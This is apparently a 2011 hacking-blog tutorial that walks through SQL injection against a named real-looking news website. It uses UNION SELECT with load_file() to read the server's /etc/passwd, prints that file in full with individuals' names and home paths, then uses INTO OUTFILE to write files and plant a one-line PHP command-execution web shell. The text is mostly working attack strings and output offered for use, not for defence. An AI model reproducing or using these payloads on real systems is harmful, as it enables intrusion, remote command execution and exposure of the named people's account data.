Uploading Shell Without Getting into Admin Panel
Sunday, July 3, 2011 // by Hacking Beast Editor //
I see a lot of people SQL injecting and trying their luck at getting into the admin panel just to upload a shell.
- This tutorial is not n00b friendly - If you use tools for SQL injection, don't bother reading this -
Code:
http://www.trends-in-newsrooms.org/articles.php?id=
Code:
http://www.trends-in-newsrooms.org/articles.php?id=1+and+2=1+union+all+select+1,2,3,4,5,6,7--
Now check whether you can call load_file() in the visible column. We can read files on this server with this function.
Usually you can execute it if you have access to the table mysql.users--
Example: 1 union all select load_file('filetoload'),2,3,4,5,6 from mysql.users--
OK, now let's take the case of this website. Let's try to read its /etc/passwd so we can find the actual path where the website is located.
Code:
http://www.trends-in-newsrooms.org/articles.php?id=1+and+2=1+union+all+select%20load_file%28%27/etc/passwd%27%29,2,3,4,5,6,7--
Code:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh stephane:x:1000:1000:stephane,,,:/home/stephane:/bin/bash sshd:x:100:65534::/var/run/sshd:/usr/sbin/nologin mysql:x:101:103:MySQL Server,,,:/var/lib/mysql:/bin/false Debian-exim:x:102:104::/var/spool/exim4:/bin/false statd:x:103:65534::/var/lib/nfs:/bin/false identd:x:104:65534::/var/run/identd:/bin/false postfix:x:105:106::/var/spool/postfix:/bin/false postgres:x:106:108:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash sympa:x:107:110:Sympa mailing list manager,,,:/var/lib/sympa:/bin/false ftpd:x:1001:1001::/home/ftp:/bin/nologin juancarlos:x:1002:1002:Juan Carlos Cedillo,,,:/home/juancarlos:/usr/lib/sftp-server clamav:x:108:111::/var/lib/clamav:/bin/false libuuid:x:109:112::/var/lib/libuuid:/bin/sh wanadmin:x:1003:1003:Stephane Karges,,,:/home/wanadmin:/bin/bash aralynn:x:1004:1004:Aralynn McMane,,,:/home/www/vhosts/wan-press.org/httpdocs/nie/downloads/:/usr/lib/sftp-server
This is probably the path where the site is located, although I am not entirely sure. Let's see if we can write a file into this directory.
I don't want any numbers written into the file I am going to write to the server, so I am going to change 2,3,4,5,6,7 to null.
Code:
http://www.trends-in-newsrooms.org/articles.php?id=1+and+2=1+union+all+select%20%27L33t~Shak-PCA~was~here%27,null,null,null,null,null,null+into+outfile+%27/home/www/vhosts/wan-press.org/httpdocs/epic.php%27--
Code:
Can't create/write to file '/home/www/vhosts/wan-press.org/httpdocs/epic.php' (Errcode: 13)
Code:
http://www.trends-in-newsrooms.org/articles.php?id=1+and+2=1+union+all+select 'L33t~Shak-PCA~was~here',null,null,null,null,null,null+into+outfile+'/var/tmp/fayul'--
Code:
http://www.trends-in-newsrooms.org/articles.php?id=-20%20union%20all%20select%20load_file%28%27/var/tmp/fayul%27%29,2,3,4,5,6,7--
Similarly, if you can find the path of the website you can write a PHP backdoor. Replace 'L33t~Shak-PCA~was~here' with:
Shell code:
Code:
'<? system($_REQUEST['cmd']); ?>'
Code:
http://www.site.com/pathtoyourbackdoor/lol.php?cmd=ls -la